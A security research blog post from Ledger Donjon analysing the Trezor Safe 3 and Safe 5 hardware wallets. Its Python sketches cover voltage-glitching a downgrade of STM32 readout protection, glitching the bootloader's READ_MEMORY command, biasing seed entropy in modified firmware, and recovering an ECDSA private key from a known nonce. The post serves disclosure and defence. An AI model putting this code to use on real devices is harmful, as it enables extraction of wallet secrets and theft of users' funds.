
Donjon | 03/12/2025

Why Secure Elements make a crucial difference to Hardware Wallet Security

Testing the security model of the Trezor Safe family

TL;DR

In contrast to the previous generations of Trezor devices, which the Ledger Donjon showed to be vulnerable to physical seed recovery attacks, the Trezor Safe line of products brings huge security improvements to the table, first and foremost through the use of a Secure Element to safeguard their users' seed. Critical cryptographic operations are still performed on a microcontroller, however, which makes attacks possible under more advanced threat models.

Introduction

Since its inception, the Ledger Donjon has made a point of continuously investing some of its time and resources in conducting open security research on projects and devices relevant to the users and stakeholders of the crypto ecosystem. The goal of this research is not only to get vulnerabilities fixed or mitigated before they can be exploited by threat actors, but also to highlight the relationship between the architecture of a crypto-handling device and the attacks that it can reasonably protect against.

Over the years, this has led the team to analyse the security of popular hardware wallets, including the Trezor One and Trezor T devices. Several critical vulnerabilities were found and responsibly disclosed to Trezor, who then worked hard to fix or mitigate the issues that could be addressed by a software update. This has resulted in concrete and significant improvements in the security of all Trezor users, and thus of the crypto ecosystem as a whole.

However, the outcome of this particular stream of research has also been to show that the very blueprint on which those devices were built made them vulnerable to inexpensive attacks allowing the seed (and thus all the digital assets) of a user to be recovered, should the device be stolen or otherwise fall into the hands of an attacker, even for a short amount of time.

Indeed both the Trezor One and the Trezor T rely on a regular microcontroller to safeguard the user’s seed. Unfortunately such microcontrollers are not designed to withstand hardware attacks, and voltage glitching attacks in particular were found to be effective in extracting their contents using only a very cheap setup.

In other words, we showed that relying only on such microcontrollers for protecting the user's secrets was not a secure option, as long as the theft of the device was a relevant threat for the user – and it is undoubtedly a very likely scenario for most hardware wallet users. In contrast, the best way to durably safeguard against fault injection attacks (of which voltage glitching is but one of the cheapest and easiest instantiations) is to rely on chips specifically designed and rigorously tested to withstand physical attacks: Secure Elements.

Trezor Safe devices

In late 2023, the first member of a new lineup of hardware wallets was released by Trezor, the Trezor Safe 3, followed shortly thereafter by the Trezor Safe 5, released in mid 2024. Both wallets share the same general architecture, which marks a stark departure from the architecture of the Trezor devices of the past. Most notably, the Trezor Safe devices are now built around a two-chip design, one of which is a proper, EAL6+ certified Secure Element, paired with a regular microcontroller.

This is a huge win for security. In that architecture, the user’s PIN and cryptographic secrets are safeguarded by the Secure Element, whose primary function is to act as a secure storage element: when the correct PIN is provided, it will grant access to the user’s secrets.

The PIN verification, and PIN retry counter, are directly handled by the Secure Element, and the users’ secrets are not accessible anywhere in the memory of the coupled microcontroller when the device is locked. This effectively thwarts any inexpensive hardware attack, in particular voltage glitching, as was previously possible on the Trezor One and Trezor T – and gives users confidence that their funds are safe even if their device gets misplaced or stolen.

The Secure Element used in the Trezor Safe 3 and Trezor Safe 5 is an Optiga Trust M (aka SLS32) sold by Infineon. It consists of both an Integrated Circuit (the chip proper, made out of silicon-based transistors), and fixed, un-updateable software, programmed onto the chip by Infineon in their production lines. This software is fully closed source.

The Optiga therefore performs a very useful but fixed, once-and-for-all function, unrelated to crypto per se: it notably allows gating the use of previously generated cryptographic secrets behind proof of knowledge of some information, for instance a PIN or another kind of shared secret. This is already extremely useful, but it does mean that all crypto-related operations proper, like the actual cryptographic signing of blockchain transactions, still have to be performed on a run-of-the-mill microcontroller.

This inherently places some amount of security responsibility onto the microcontroller, and in particular onto the integrity of the software that runs on it. Indeed, if an attacker were able to modify or otherwise control the software stored in the microcontroller's flash memory, they could bias the manipulation of entropy that is at the heart of the crypto-related operations performed by the microcontroller. This would be devastating, as it would allow an attacker to remotely gain access to all the user's funds (more details on this below).

In other words, the new architecture of the Trezor Safe 3 and Trezor Safe 5 devices, incorporating an off-the-shelf, pre-programmed Secure Element, correctly addresses the threat of seed recovery on a stolen device, which is arguably one of the most severe and likely threats that a crypto-user faces. The importance of this really cannot be overstated. 

Other threats do exist however, and we set out to understand exactly how confident a user could be of the software that runs on their device, under the assumption that an attacker might have had access to its inner workings before it ended up in the hands of the user.

Firmware integrity – the attacker’s perspective

Let’s put ourselves in the shoes of an attacker for a moment then, and examine in more detail the attack surface of the Trezor Safe 3.

The microcontroller used is labeled TRZ32F429 – this is actually an STM32F429 chip packaged into a BGA with custom markings. In spite of the Trezor-specific package, it is electrically identical to an STM32F429, and this chip family is known to be vulnerable to voltage glitching, enabling read and write access to its flash contents. This is a very powerful primitive that we can leverage to mount an attack on the device as a whole. We only have to design a small adapter board, breaking out the TRZ32F429's pads onto standard headers, so that it can be mounted onto our main attack board.

The TRZ32F429 as found in the Trezor Safe 3, and the adapter board we designed for it.

Technical details

The attack works as follows.

The STM32F4 has various configuration bytes stored in flash, including one called the RDP (for ReaDout Protection) level. It is stored in one byte, with a fault detection mechanism, but can really only assume three levels: RDP0, which amounts to no protection; RDP1, a strict protection that still allows a very limited amount of debugging; and RDP2, the strongest protection, which is supposed to be irreversible.

  • In RDP0, both ST’s built-in bootloader and the debug interface (for JTAG/SWD) allow to fully R/W all the flash memory of the device.
  • In RDP1, flash is not readable from those interfaces.
  • In RDP2, both the bootloader and the debug interface are disabled – this is the mode used in Trezor Safe 3 devices. Once in RDP2, it should be impossible to go back to RDP1 or RDP0.

As we said however, the RDP level is stored in flash, and to have any effect on the circuitry of, say, the debug interface, it first has to be somehow registered into digital logic. This is done during the boot phase of the device, before any instruction gets executed by the core. If a voltage glitch occurs during this fetch from flash, the RDP value read has a tendency to get corrupted. An error detection mechanism is in place, but its error case causes the device to read the RDP level as 1 – and sometimes, although much less often, the fault just happens to corrupt it into a valid state anyway. So with voltage glitching, the RDP level can be downgraded from 2 to 1.
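To make this more concrete, here is a minimal sketch of what such a glitch campaign can look like. The three helper functions are placeholders for whatever fault-injection hardware and SWD probe are actually used, and the delay/width ranges are arbitrary examples, not the real parameters.

```python
# Minimal sketch of the boot-time RDP downgrade campaign, assuming custom
# glitching hardware; the three helpers are placeholders and the delay/width
# ranges are arbitrary examples.
import itertools

def arm_glitch(delay_ns: int, width_ns: int) -> None:
    """Placeholder: program the glitcher to pull the core supply down for
    width_ns nanoseconds, delay_ns after reset is released (i.e. while the
    option bytes, including the RDP level, are being fetched from flash)."""
    raise NotImplementedError

def power_cycle_target() -> None:
    """Placeholder: reset the TRZ32F429 so that it reloads its RDP level."""
    raise NotImplementedError

def debug_port_open() -> bool:
    """Placeholder: returns True if SWD now answers, i.e. the chip booted
    with an effective RDP level of 1 instead of 2."""
    raise NotImplementedError

for delay_ns, width_ns in itertools.product(range(0, 20_000, 50),
                                            range(50, 400, 10)):
    arm_glitch(delay_ns, width_ns)
    power_cycle_target()
    if debug_port_open():
        print(f"RDP downgraded with delay={delay_ns} ns, width={width_ns} ns")
        break
```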

This change would not persist across boots on its own, but we can make it permanent because the configuration bytes, for the most part, can be reprogrammed through the debug interface when RDP1 is active. Alas, we cannot set the RDP level to 0 directly, as doing so would trigger the flash controller to mass erase the flash, which of course we do not want to do yet.

That capability becomes very useful once any secret has been recovered, as it lets us reprogram the chip at will – including rolling back write protection on any flash page.

But something else we can do in RDP1 is communicate with ST's built-in bootloader, which we could not do in RDP2. The bootloader implements several commands, the most interesting of which, for us, is the READ_MEMORY command. As previously mentioned, the reference manual indicates that, in RDP1, flash memory is not readable when booting into the bootloader. As it happens however, this is not enforced by any hardware mechanism (although it is for accesses made through the debug interface), but purely by the code of the bootloader itself.

In practice, a simple check is made against the RDP level, and the command is rejected if the chip is not in RDP0. This check can be glitched, and with the right glitch parameters and the right timing, it is possible to render it moot, and when that happens the command successfully returns 256 bytes of data read from an address of our choosing. To read more data, the glitch has to be repeated. For the Trezor Safe 3, the secret data is stored on 32 contiguous bytes, and thus can be read with a single successful READ_MEMORY glitch.
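For illustration, the sketch below drives the READ_MEMORY command of ST's USART bootloader, following the framing documented in application note AN3155, and retries until one glitch lands. It assumes the chip has already been reset into the system bootloader behind a serial adapter; trigger_glitch() and the target flash address are placeholders, and error recovery after a crashed attempt is omitted.

```python
# Sketch of the READ_MEMORY glitch loop over ST's USART bootloader (AN3155).
# trigger_glitch() and the flash address are placeholders.
import serial  # pyserial

ACK, NACK = 0x79, 0x1F

def trigger_glitch() -> None:
    """Placeholder: arm the glitcher so the pulse lands on the bootloader's
    RDP check, shortly after the command bytes have been sent."""
    pass

def read_256(ser: serial.Serial, address: int) -> bytes | None:
    trigger_glitch()
    ser.write(bytes([0x11, 0xEE]))              # READ_MEMORY opcode + XOR complement
    if ser.read(1) != bytes([ACK]):
        return None                             # check not glitched: NACKed in RDP1
    addr = address.to_bytes(4, "big")
    ser.write(addr + bytes([addr[0] ^ addr[1] ^ addr[2] ^ addr[3]]))
    if ser.read(1) != bytes([ACK]):
        return None
    ser.write(bytes([0xFF, 0x00]))              # request 256 bytes (N-1 = 0xFF)
    if ser.read(1) != bytes([ACK]):
        return None
    return ser.read(256)

with serial.Serial("/dev/ttyUSB0", 115200, parity=serial.PARITY_EVEN, timeout=1) as ser:
    ser.write(b"\x7f")                          # autobaud byte; bootloader answers ACK
    ser.read(1)
    data = None
    while data is None:                         # retry until one glitch lands
        data = read_256(ser, 0x08000000)        # arbitrary example address
    print(data.hex())
```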


The Optiga is also, of course, present on the PCB, and implements a communication protocol to exchange commands and data with the microcontroller. The Optiga, beyond forbidding access to the user’s secrets unless the correct PIN has been provided, critically also serves a key role in the verification, by Trezor Suite, of the device’s genuineness. This is accomplished by the Optiga generating, during production, a secret/public key pair for itself, wrapping the public part into a certificate that is signed by Trezor. 

To verify the authenticity of a Trezor device, then, Trezor Suite submits a random challenge to the device, and the Optiga signs it. This signature, together with the certificate generated during production, makes it possible to authenticate that this particular Optiga has been configured by Trezor, on their production line.
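Conceptually, the host-side verification looks something like the sketch below, assuming ECDSA over NIST P-256, DER-encoded signatures and a single-level certificate chain; the exact message framing and chain validation performed by Trezor Suite are simplified away.

```python
# Simplified sketch of the genuineness check, under the assumptions stated above.
import os
from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

def verify_device_genuineness(sign_on_device, device_cert_der: bytes,
                              trezor_ca_pubkey: ec.EllipticCurvePublicKey) -> bool:
    challenge = os.urandom(32)
    signature = sign_on_device(challenge)        # computed by the Optiga, on the device
    cert = x509.load_der_x509_certificate(device_cert_der)
    try:
        # 1. The device certificate must have been signed by Trezor during production.
        trezor_ca_pubkey.verify(cert.signature, cert.tbs_certificate_bytes,
                                ec.ECDSA(cert.signature_hash_algorithm))
        # 2. The fresh challenge must have been signed by the key in that certificate.
        cert.public_key().verify(signature, challenge, ec.ECDSA(hashes.SHA256()))
        return True
    except InvalidSignature:
        return False
```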

While powerful, this mechanism only authenticates the Optiga, not the microcontroller, and does not attest to what software is running on the latter. To try and include the microcontroller’s software into the check, then, a per-device pre-shared secret is used, once again provisioned in production, and known only to the Optiga and the microcontroller of a same Trezor Safe 3 device. The Optiga only accepts signature requests if the microcontroller it is attached to can prove that it has knowledge of this pre-shared secret.
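As a purely illustrative example, and not necessarily the exact scheme used between the Optiga and the TRZ32F429, an HMAC-based challenge-response is one standard way to implement such a proof of knowledge:

```python
# Illustrative only: a standard HMAC challenge-response as a stand-in for the
# actual Optiga/microcontroller binding mechanism.
import hashlib
import hmac
import os

PRE_SHARED_SECRET = os.urandom(32)   # stand-in for the secret provisioned into both chips

def optiga_challenge() -> bytes:
    return os.urandom(16)

def mcu_prove(challenge: bytes, secret: bytes) -> bytes:
    # The microcontroller can only answer if it holds the secret in its flash...
    return hmac.new(secret, challenge, hashlib.sha256).digest()

def optiga_accepts(challenge: bytes, proof: bytes) -> bool:
    expected = hmac.new(PRE_SHARED_SECRET, challenge, hashlib.sha256).digest()
    return hmac.compare_digest(expected, proof)

# ...which is exactly why extracting that secret from flash lets arbitrary,
# modified firmware keep passing the check.
challenge = optiga_challenge()
assert optiga_accepts(challenge, mcu_prove(challenge, PRE_SHARED_SECRET))
```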

This provides a link between the Optiga and the microcontroller, but a somewhat weak one: it does not, as such, attest to the software running on the microcontroller, but rather only to it having access to a pre-shared secret. As the latter is stored on the flash memory of the TRZ32F429, voltage glitching can be used to read it out, before arbitrarily reprogramming the chip, thereby preserving the full impression of an authentic device, while allowing the implementation of attacks that could lead to the remote recovery of all the user’s funds (for instance by biasing the generation of the seed, or manipulating the nonce of ECDSA signatures).


Technical details

Let us get into a little more detail on this point. The seed is generated and stored (in encrypted form, in such a way that the right PIN has to be provided to the Optiga for it to be decryptable) on the microcontroller, thus corrupted software running on that microcontroller could very well bias the seed’s entropy, for instance reducing it to 32 bits – enough for collisions between victims to be unlikely, but fully enumerable for an attacker. The latter could just monitor all the corresponding addresses for any fund, and sign malign transactions to siphon away those funds at any moment they so choose.
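The toy sketch below illustrates the point: the biased entropy still looks random, yet only 2^32 candidate values exist, all of which an attacker can derive offline. The expansion function is an arbitrary example.

```python
# Toy illustration of the entropy-biasing attack described above.
import hashlib
import os

def honest_entropy() -> bytes:
    return os.urandom(16)                  # 128 bits: infeasible to enumerate

def backdoored_entropy(counter: int) -> bytes:
    # Expand a 32-bit value into 16 "random-looking" bytes (arbitrary expansion).
    return hashlib.sha256(counter.to_bytes(4, "big")).digest()[:16]

# The attacker replays the same expansion offline for every possible counter,
# derives the corresponding wallets, and watches the chain for funded addresses.
candidates = (backdoored_entropy(i) for i in range(2**32))
```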

Another option would be for the attacker to bias the entropy of the nonce generation of ECDSA signatures used in blockchain transactions. This nonce has to remain secret for the signature mechanism to be cryptographically sound (the signature, together with the nonce, can be used to compute back the secret key used for signing), but as the nonce is generated and manipulated on the microcontroller, corrupted software could bias it in an arbitrary manner, thereby allowing the attacker to recover the user’s secret keys, and all their funds.
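The algebra behind this is simple enough to show in a few lines: given a signature (r, s) on a message hash z, knowledge of the nonce k yields the private key as d = r^-1 (s*k - z) mod n. The sketch below works this through on secp256k1 with a toy pure-Python implementation.

```python
# Pure-Python secp256k1, for illustration only: with the nonce k known,
# a single modular inversion recovers the signing key from (r, s) and z.
import hashlib
import secrets

p = 2**256 - 2**32 - 977
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(P, Q):
    if P is None: return Q
    if Q is None: return P
    if P[0] == Q[0] and (P[1] + Q[1]) % p == 0:
        return None
    if P == Q:
        lam = 3 * P[0] * P[0] * pow(2 * P[1], -1, p) % p
    else:
        lam = (Q[1] - P[1]) * pow(Q[0] - P[0], -1, p) % p
    x = (lam * lam - P[0] - Q[0]) % p
    return (x, (lam * (P[0] - x) - P[1]) % p)

def ec_mul(k, P):
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

# Honest signature: private key d, message hash z, nonce k.
d = secrets.randbelow(n - 1) + 1
z = int.from_bytes(hashlib.sha256(b"transaction to sign").digest(), "big")
k = secrets.randbelow(n - 1) + 1      # imagine corrupted firmware fixing or leaking this
r = ec_mul(k, G)[0] % n
s = pow(k, -1, n) * (z + r * d) % n

# Attacker, knowing (r, s), z and the nonce k, recovers the private key:
d_recovered = pow(r, -1, n) * (s * k - z) % n
assert d_recovered == d
```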

Fortunately, Trezor are fully aware of these two potential attacks, and have been working on making them more difficult to achieve.

Starting from this architecture-level analysis, it is only a matter of time and engineering effort to pull off the attack in practice, which we were able to demonstrate. Crucially, the attack is implemented purely in software, and the cryptographic attestation of the device is fully preserved, as is its electronics, thereby making the attack very hard, if not impossible, to detect either cryptographically or by visual inspection of the PCB (although note that we do have to desolder the MCU to mount it onto our attack setup, before soldering it back onto the PCB once the attack is done, which may leave some traces, especially if done by hand).

PCBs of two Trezor Safe 3, one running genuine software and the other running modified firmware.

Firmware check

This is not quite the full picture however, because another layer of protection has been implemented by Trezor to try and detect devices running modified, non-genuine software, which, as we saw, could put the user at risk. Specifically, when using the device with Trezor Suite, the latter sends a random challenge to the device, which then computes a hash incorporating both the challenge and its running firmware. This allows Trezor Suite to validate the result against a database of genuine software images, and is a very elegant protection.

The security of this mechanism relies on the fact that, because of the random challenge, the hash has to be recomputed in full by the device, every single time. An attacker cannot simply hardcode a hash and send it back to Trezor Suite: they really have to have the full software image at hand, so as to be able to compute the hash for any possible challenge. Given that the microcontroller has limited flash memory, this is a big impediment to any attacker trying to modify the software running on a device. Still, we were able to fully bypass this protection, proving that while very clever, it is not in itself robust enough to thwart determined attackers.
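In outline, the check works along the following lines; the exact hash construction used by the device and Trezor Suite is not reproduced here, this is only a sketch of the principle.

```python
# Sketch of the firmware-check principle: the fresh challenge forces the device
# to hash its real flash contents on every request.
import hashlib
import os

def device_firmware_hash(challenge: bytes, flash_contents: bytes) -> bytes:
    # The device hashes its actual flash contents, salted by the fresh challenge.
    return hashlib.sha256(challenge + flash_contents).digest()

def suite_check(challenge: bytes, reported: bytes, known_genuine_images) -> bool:
    # Trezor Suite recomputes the hash for every known genuine image.
    return any(device_firmware_hash(challenge, image) == reported
               for image in known_genuine_images)

challenge = os.urandom(32)
genuine_image = b"\x00" * 1024      # stand-in for a real firmware image
assert suite_check(challenge, device_firmware_hash(challenge, genuine_image),
                   [genuine_image])
```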


Technical details

If you think about it, the parts of cryptography dealing with authenticity (rather than confidentiality and integrity) allow one to provide and verify the proof of knowledge of some data. This is usually used to prove knowledge of a sufficiently large, truly random secret key, as is the case for the authenticity check implemented using the Optiga in the Trezor Safe devices.

However, the same cryptographic mechanisms can also be used to prove knowledge of arbitrary, not necessarily secret data, and this is what is done in the firmware check. Of course, this is only secure as long as the memory of the microcontroller cannot be extended and the firmware image is not compressible.

The latter assumption is by necessity brittle though, as code is inherently structured data, and thus can be compressed. This is not to say that implementing an attack based on that possibility is easy however, and making the firmware harder to compress, for instance by avoiding leaving any blank space in flash, makes any attack harder to implement in practice.
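A quick way to gauge how brittle that assumption is, is simply to compress a firmware image and see how much flash an attacker could reclaim for their own code. The firmware file name below is a placeholder.

```python
# Compress a firmware image to estimate the flash space an attacker could free up.
import zlib

with open("trezor-safe3-firmware.bin", "rb") as f:   # placeholder file name
    firmware = f.read()

compressed = zlib.compress(firmware, level=9)
print(f"original:   {len(firmware)} bytes")
print(f"compressed: {len(compressed)} bytes "
      f"({100 * len(compressed) / len(firmware):.1f}% of the original)")
```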

This is not to say that this is not a useful addition to the security posture of the devices, on the contrary: it does make it harder to pull off the attack in practice. But it cannot stand alone, and in the end the overall security of the devices really does depend on the security of the underlying platform, here a microcontroller.

This brings us to the Trezor Safe 5, which uses a more recent microcontroller from the STM32 line-up, the STM32U5, for which no fault injection attack has been made public at the time of this writing, and whose design explicitly takes into account the possibility of threats like voltage glitching. Although it still won't be as secure as a Secure Element, this does improve the security of the devices, as compared with ones equipped with a TRZ32F429 – at least for a while.

Conclusion

We consider it one of the Donjon's core missions to keep pushing the boundaries of security in the crypto ecosystem so as to protect users, and this effort seems to be paying off, with more and more devices taking hardware attacks into account and integrating Secure Elements into their architecture.

Just using a Secure Element does not mean that all threat scenarios are automatically rendered moot however, and together with the burgeoning of the crypto ecosystem, so too might burgeon more sophisticated and specialised threat actors, who might not choose to limit themselves to opportunistic attacks on stolen devices alone.

The Donjon will thus continue to research the security of crypto-manipulating devices, and strive to always better the security of the crypto ecosystem as a whole, under all the relevant threat models.


Charles Christen and Marion Lafon,
With much help from Karim Abdellatif, Baptistin Boilot and Olivier Hériveaux

Security Engineers
